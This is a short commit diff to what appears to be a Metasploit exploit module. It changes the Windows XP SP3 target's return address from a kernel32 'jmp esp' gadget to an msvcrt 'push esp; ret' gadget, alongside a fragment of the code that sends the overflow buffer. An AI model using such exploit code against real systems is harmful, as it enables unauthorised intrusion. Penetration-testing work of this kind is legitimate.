changed return address

unstable
Doug Prostko 2012-09-12 18:46:53 -04:00
parent f65e2ea923
commit d64208a604
1 changed files with 1 additions and 2 deletions

View File

@ -47,7 +47,7 @@ class Metasploit4 < Msf::Exploit::Remote
[
[ 'Windows XP SP3',
{
'Ret' => 0x7c83c2c5, # jmp esp kernel32.dll
'Ret' => 0x77c35459 , # push esp; ret - mscvrt.dll
'Offset' => 230
}
],
@ -75,5 +75,4 @@ class Metasploit4 < Msf::Exploit::Remote
send_user(buf)
disconnect
end
end